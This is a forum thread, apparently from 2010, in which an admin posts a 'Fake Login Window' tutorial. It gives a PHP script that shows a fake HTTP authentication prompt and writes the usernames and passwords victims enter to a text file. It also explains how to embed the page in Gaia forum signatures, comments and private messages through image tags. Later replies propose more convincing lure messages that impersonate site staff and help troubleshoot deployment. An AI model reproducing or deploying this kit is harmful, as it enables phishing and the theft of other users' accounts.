Would you like to react to this message? Create an account in a few clicks or log in to continue.

You are not connected. Please login or register

Go to page : 1, 2  Next

View previous topic View next topic Go down  Message [Page 1 of 2]

1How To Make FLW Empty How To Make FLW Tue Aug 17, 2010 4:04 pm

Thomas

Thomas
Admin
Loading
FLW = Fake Login Window

They are easy to make ill post youtube video to show how to make one

You'll need a T35.com account Then you make 2 new files one called

Index.php and other one Accounts.txt

Then you'll need to post This Code in Index.php
Code:

<?php

    if(isset($_SERVER['PHP_AUTH_USER'])){

        $Handle = @fopen('Accounts.txt', 'a');

     

        @fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");

        @fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");

     

        @fclose($Handle);

    }

    header('WWW-Authenticate: Basic realm="Account was disconnected please reconnect."');

    header('HTTP/1.0 401 Unauthorized');

    exit;

 ?>
First you make Index.php

then you make Accounts.txt

if it is not named Acocunts.txt it will not work

This Might Help

To make it pop-up do this

put it in your sig the Index.php

and do this
Code:

[img]    Youraccount .t35 .com.    [/img]
That will Pop up in forums and profiles



Last edited by Raze on Mon Aug 29, 2011 5:53 pm; edited 5 times in total (Reason for editing : Updated)

2How To Make FLW Empty Re: How To Make FLW Tue Aug 17, 2010 4:07 pm

Sound

Sound
Undertaker
Loading
thnak you

3How To Make FLW Empty Re: How To Make FLW Tue Aug 17, 2010 10:25 pm

Thomas

Thomas
Admin
Loading
Light wrote:thnak you
np

4How To Make FLW Empty :P Wed Aug 18, 2010 4:35 pm

Erebus

Erebus
Achiever
Loading
cool :O, who taught you this[quote]

5How To Make FLW Empty Re: How To Make FLW Wed Aug 18, 2010 8:31 pm

xFLAMeHD

xFLAMeHD
Contributor
Loading
Thanks auto Razz

6How To Make FLW Empty Re: How To Make FLW Wed Aug 18, 2010 11:33 pm

Sleepy

Sleepy
Contributor
Loading
you should change
A session error has occured please verify your Username and Password



Into something more beliaveable/ legit looking.


Just sounds...wrong.

" Gaia's new bot forum check please verify you're human "

Or something like that.

7How To Make FLW Empty Re: How To Make FLW Thu Aug 19, 2010 7:32 pm

Thomas

Thomas
Admin
Loading
I posting here for a test

8How To Make FLW Empty Re: How To Make FLW Thu Aug 19, 2010 7:34 pm

Erebus

Erebus
Achiever
Loading
Auto wrote:I posting here for a test
its back Sad

9How To Make FLW Empty Re: How To Make FLW Fri Aug 20, 2010 3:21 am

Sound

Sound
Undertaker
Loading
whats back?

10How To Make FLW Empty Re: How To Make FLW Fri Aug 20, 2010 7:33 am

Top

avatar
Contributor
Loading
Sleepy wrote:you should change
A session error has occured please verify your Username and Password



Into something more beliaveable/ legit looking.


Just sounds...wrong.

" Gaia's new bot forum check please verify you're human "

Or something like that.
Indeed, more like "Lanzer is fixing an update on the profiles. It'll go away, but please enter your password to go on Gaia." Why not that?

11How To Make FLW Empty Re: How To Make FLW Fri Aug 20, 2010 4:19 pm

Syn

avatar
Spoiler
Loading
Nice tut, I was gunna make it xD.

12How To Make FLW Empty Re: How To Make FLW Fri Aug 20, 2010 11:30 pm

Guest

avatar
Guest
Loading
you should more like put in your description that theyy can change the

"A session error has occured please verify your Username and Password."');


?>

13How To Make FLW Empty Re: How To Make FLW Sat Aug 21, 2010 5:20 pm

Sound

Sound
Undertaker
Loading
Give him rep if yall ant

14How To Make FLW Empty Re: How To Make FLW Sun Sep 12, 2010 10:32 pm

Thomas

Thomas
Admin
Loading
Moved to the right place

15How To Make FLW Empty Re: How To Make FLW Mon Sep 13, 2010 1:13 am

Thomas

Thomas
Admin
Loading
Did this help anyone? let me know :C

16How To Make FLW Empty Re: How To Make FLW Fri Oct 08, 2010 4:48 pm

Jerry

Jerry
Fresh Meat
Loading
Thanks Soooo MUCH!!

17How To Make FLW Empty Re: How To Make FLW Fri Oct 08, 2010 8:07 pm

Thomas

Thomas
Admin
Loading
Smushmaster wrote:Thanks Soooo MUCH!!
lol np
I've known this for like 6 months or more now

18How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:02 am

Z3N0C1D3

Z3N0C1D3
Undertaker
Loading
DJ wrote:
Smushmaster wrote:Thanks Soooo MUCH!!
lol np
I've known this for like 6 months or more now

I tried it. but FAILED :C

19How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:05 am

Thomas

Thomas
Admin
Loading
i tried it like 4 days ago and it worked fine

20How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:21 am

Z3N0C1D3

Z3N0C1D3
Undertaker
Loading
DJ wrote:i tried it like 4 days ago and it worked fine

dude how to make it pop up in gaia (forums and profiles)?

It worked now. the problem is it doesnt pop up :C

21How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:23 am

Thomas

Thomas
Admin
Loading
Failed wrote:
DJ wrote:i tried it like 4 days ago and it worked fine

dude how to make it pop up in gaia (forums and profiles)?

It worked now. the problem is it doesnt pop up :C
every time you post the flw in like comments or some thing you do
Code:
[img] t35 account flw here [/img]

22How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:24 am

Thomas

Thomas
Admin
Loading
if it still doesn't pop up maybe your t35 account got banned

23How To Make FLW Empty Re: How To Make FLW Sun Oct 10, 2010 3:29 am

Z3N0C1D3

Z3N0C1D3
Undertaker
Loading
Na. it still active. not yet bann. i tested using the comments. wont work. can u give me screenies? if u want Very Happy

24How To Make FLW Empty Re: How To Make FLW Wed Oct 13, 2010 2:49 am

Z3N0C1D3

Z3N0C1D3
Undertaker
Loading
Only put this in the signature pro on gaia?

How To Make FLW     Youraccount .t35 .com

25How To Make FLW Empty Re: How To Make FLW Wed Oct 13, 2010 8:29 pm

Thomas

Thomas
Admin
Loading
you can post it in pms in forums and comments and you can also put it on your sig

Sponsored content


Loading

View previous topic View next topic Back to top  Message [Page 1 of 2]

Go to page : 1, 2  Next

Related topics

Permissions in this forum:
You cannot reply to topics in this forum